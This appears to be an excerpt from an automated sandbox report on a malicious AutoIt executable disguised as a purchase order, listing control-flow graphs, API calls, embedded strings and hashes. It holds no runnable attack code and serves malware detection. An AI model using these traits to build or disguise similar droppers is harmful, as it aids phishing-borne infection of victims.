                                                    control_flow_graph 1230 452ac7-452b53 call 422240 call 442c5a call 4150d1 call 41313c 1239 452c30-452c3a call 452719 1230->1239 1240 452b59-452b6a call 452719 1230->1240 1244 452c3f-452c41 1239->1244 1245 452b6c-452b77 1240->1245 1246 452b7a-452c2e call 413a0e call 411567 call 411536 call 413a0e call 411536 * 2 1240->1246 1244->1245 1247 452c47-452d18 call 414d04 * 8 call 431e1f call 4149c2 1244->1247 1246->1247 1280 452d28-452d43 call 442bb4 1247->1280 1281 452d1a-452d25 1247->1281 1284 452de2-452df7 call 414a46 1280->1284 1285 452d49 1280->1285 1291 452e15-452e1a 1284->1291 1292 452df9-452e12 DeleteFileW 1284->1292 1287 452d51-452d59 1285->1287 1289 452d5f 1287->1289 1290 452d5b-452d5d 1287->1290 1293 452d64-452d86 call 414d04 1289->1293 1290->1293 1294 452ea6-452ebb CopyFileW 1291->1294 1295 452e20-452e81 call 431e9e call 431e71 call 44b1a9 1291->1295 1303 452da9-452dcc call 432229 call 4142b6 1293->1303 1304 452d88-452da7 call 442c29 1293->1304 1297 452ebd-452ed6 DeleteFileW 1294->1297 1298 452ed9-452ef5 DeleteFileW call 431ddb 1294->1298 1315 452e86-452e88 1295->1315 1305 452efa-452f02 1298->1305 1314 452dd1-452ddc 1303->1314 1304->1303 1314->1284 1316 452d4b-452d4d 1314->1316 1315->1298 1317 452e8a-452ea3 DeleteFileW 1315->1317 1316->1287
                                                    APIs
                                                      • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                    • _fseek.LIBCMT ref: 00452B3B
                                                    • __wsplitpath.LIBCMT ref: 00452B9B
                                                    • _wcscpy.LIBCMT ref: 00452BB0
                                                    • _wcscat.LIBCMT ref: 00452BC5
                                                    • __wsplitpath.LIBCMT ref: 00452BEF
                                                    • _wcscat.LIBCMT ref: 00452C07
                                                    • _wcscat.LIBCMT ref: 00452C1C
                                                    • __fread_nolock.LIBCMT ref: 00452C53
                                                    • __fread_nolock.LIBCMT ref: 00452C64
                                                    • __fread_nolock.LIBCMT ref: 00452C83
                                                    • __fread_nolock.LIBCMT ref: 00452C94
                                                    • __fread_nolock.LIBCMT ref: 00452CB5
                                                    • __fread_nolock.LIBCMT ref: 00452CC6
                                                    • __fread_nolock.LIBCMT ref: 00452CD7
                                                    • __fread_nolock.LIBCMT ref: 00452CE8
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                    • __fread_nolock.LIBCMT ref: 00452D78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                    • String ID:
                                                    • API String ID: 2054058615-0
                                                    • Opcode ID: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                    • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                    • Opcode Fuzzy Hash: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                    • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1318 46e1a6-46e1ba 1319 46e1c0-46e1cd call 40c650 1318->1319 1320 46e45e 1318->1320 1319->1320 1325 46e1d3-46e1d7 1319->1325 1322 46e462-46e47d call 4533eb call 445ae0 1320->1322 1329 46e483-46e48a 1322->1329 1330 46e1dc-46e1e3 1322->1330 1325->1322 1331 46e2e7-46e2fa call 40f760 1330->1331 1332 46e1e9-46e214 call 45340c call 411567 call 413e1f 1330->1332 1338 46e2fc-46e30b call 403cd0 1331->1338 1339 46e30d-46e343 call 45340c call 413a0e 1331->1339 1351 46e216-46e255 call 411567 call 411536 call 45340c call 411536 1332->1351 1352 46e258-46e282 call 45340c call 411567 call 433998 1332->1352 1346 46e2c8-46e2e4 call 408f40 1338->1346 1354 46e374-46e3fa call 411567 call 411536 * 3 call 45340c call 433784 call 4339fa 1339->1354 1355 46e345-46e34d 1339->1355 1351->1352 1380 46e284-46e29c call 4111c1 1352->1380 1381 46e29e-46e2c2 call 45340c call 44bd27 1352->1381 1397 46e403-46e405 1354->1397 1398 46e3fc-46e3ff 1354->1398 1355->1354 1359 46e34f-46e371 call 411567 * 2 1355->1359 1359->1354 1380->1346 1380->1381 1381->1329 1381->1346 1399 46e407-46e41e call 45340c call 452ac7 1397->1399 1401 46e436-46e444 call 408f40 1397->1401 1398->1399 1400 46e401 1398->1400 1408 46e423-46e425 1399->1408 1400->1401 1407 46e44b-46e45b call 431e58 1401->1407 1408->1407 1410 46e427-46e431 call 403cd0 1408->1410 1410->1401
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                    • API String ID: 0-1896584978
                                                    • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                    • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,00000104,?), ref: 00401F4C
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • __wcsicoll.LIBCMT ref: 00402007
                                                    • __wcsicoll.LIBCMT ref: 0040201D
                                                    • __wcsicoll.LIBCMT ref: 00402033
                                                      • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                    • __wcsicoll.LIBCMT ref: 00402049
                                                    • _wcscpy.LIBCMT ref: 0040207C
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,00000104), ref: 00428B5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\[Purchase Order] PO2411024.exe$CMDLINE$CMDLINERAW
                                                    • API String ID: 3948761352-426827265
                                                    • Opcode ID: bdb5ac018524820467b0179db70ca73b3ddff588823d545afa360bb69cd24784
                                                    • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                    • Opcode Fuzzy Hash: bdb5ac018524820467b0179db70ca73b3ddff588823d545afa360bb69cd24784
                                                    • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                    • String ID: D)E$D)E$FILE
                                                    • API String ID: 3888824918-361185794
                                                    • Opcode ID: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                    • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                    • Opcode Fuzzy Hash: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                    • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                    • _wcscat.LIBCMT ref: 00427541
                                                    • _wcslen.LIBCMT ref: 00427551
                                                    • _wcslen.LIBCMT ref: 00427562
                                                    • _wcscat.LIBCMT ref: 0042757C
                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                    • String ID: Include$\
                                                    • API String ID: 3173733714-3429789819
                                                    • Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                    • Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                    Control-flow Graph

                                                    APIs
                                                    • _fseek.LIBCMT ref: 0045292B
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                    • _fseek.LIBCMT ref: 004529BF
                                                    • _malloc.LIBCMT ref: 004529CA
                                                    • _malloc.LIBCMT ref: 004529D6
                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                    • _free.LIBCMT ref: 00452A17
                                                    • _free.LIBCMT ref: 00452A20
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                    • String ID:
                                                    • API String ID: 1255752989-0
                                                    • Opcode ID: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                    • Opcode Fuzzy Hash: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                    • ImageList_ReplaceIcon.COMCTL32(00AC6160,000000FF,00000000), ref: 00410552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AC6160,000000FF,00000000), ref: 00410552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _malloc
                                                    • String ID: Default
                                                    • API String ID: 1579825452-753088835
                                                    • Opcode ID: 8862e6c835510d4615abaaf8b267028e04c562e228266a0e05f43dc76da4e5e3
                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                    • Opcode Fuzzy Hash: 8862e6c835510d4615abaaf8b267028e04c562e228266a0e05f43dc76da4e5e3
                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2137 40f5c0-40f5cf call 422240 2140 40f5d0-40f5e8 2137->2140 2140->2140 2141 40f5ea-40f613 call 413650 call 410e60 2140->2141 2146 40f614-40f633 call 414d04 2141->2146 2149 40f691 2146->2149 2150 40f635-40f63c 2146->2150 2151 40f696-40f69c 2149->2151 2152 40f660-40f674 call 4150d1 2150->2152 2153 40f63e 2150->2153 2157 40f679-40f67c 2152->2157 2155 40f640 2153->2155 2156 40f642-40f650 2155->2156 2158 40f652-40f655 2156->2158 2159 40f67e-40f68c 2156->2159 2157->2146 2160 40f65b-40f65e 2158->2160 2161 425d1e-425d3e call 4150d1 call 414d04 2158->2161 2162 40f68e-40f68f 2159->2162 2163 40f69f-40f6ad 2159->2163 2160->2152 2160->2155 2174 425d43-425d5f call 414d30 2161->2174 2162->2158 2165 40f6b4-40f6c2 2163->2165 2166 40f6af-40f6b2 2163->2166 2168 425d16 2165->2168 2169 40f6c8-40f6d6 2165->2169 2166->2158 2168->2161 2171 425d05-425d0b 2169->2171 2172 40f6dc-40f6df 2169->2172 2171->2156 2173 425d11 2171->2173 2172->2158 2173->2168 2174->2151
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                    • String ID: AU3!$EA06
                                                    • API String ID: 1268643489-2658333250
                                                    • Opcode ID: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                    • Opcode Fuzzy Hash: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2177 401100-401111 2178 401113-401119 2177->2178 2179 401179-401180 2177->2179 2181 401144-40114a 2178->2181 2182 40111b-40111e 2178->2182 2179->2178 2180 401182 2179->2180 2185 40112c-401141 DefWindowProcW 2180->2185 2183 401184-40118e call 401250 2181->2183 2184 40114c-40114f 2181->2184 2182->2181 2186 401120-401126 2182->2186 2194 401193-40119a 2183->2194 2188 401151-401157 2184->2188 2189 40119d 2184->2189 2186->2185 2187 42b038-42b03f 2186->2187 2187->2185 2193 42b045-42b059 call 401000 call 40e0c0 2187->2193 2191 401219-40121f 2188->2191 2192 40115d 2188->2192 2195 4011a3-4011a9 2189->2195 2196 42afb4-42afc5 call 40f190 2189->2196 2191->2186 2199 401225-42b06d call 468b0e 2191->2199 2197 401163-401166 2192->2197 2198 42b01d-42b024 2192->2198 2193->2185 2195->2186 2202 4011af 2195->2202 2196->2194 2206 42afe9-42b018 call 40f190 call 401a50 2197->2206 2207 40116c-401172 2197->2207 2198->2185 2205 42b02a-42b033 call 4370f4 2198->2205 2199->2194 2202->2186 2203 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2202->2203 2204 4011db-401202 SetTimer RegisterWindowMessageW 2202->2204 2204->2194 2212 401204-401216 CreatePopupMenu 2204->2212 2205->2185 2206->2185 2207->2186 2214 401174-42afde call 45fd57 2207->2214 2214->2185 2228 42afe4 2214->2228 2228->2194
                                                    APIs
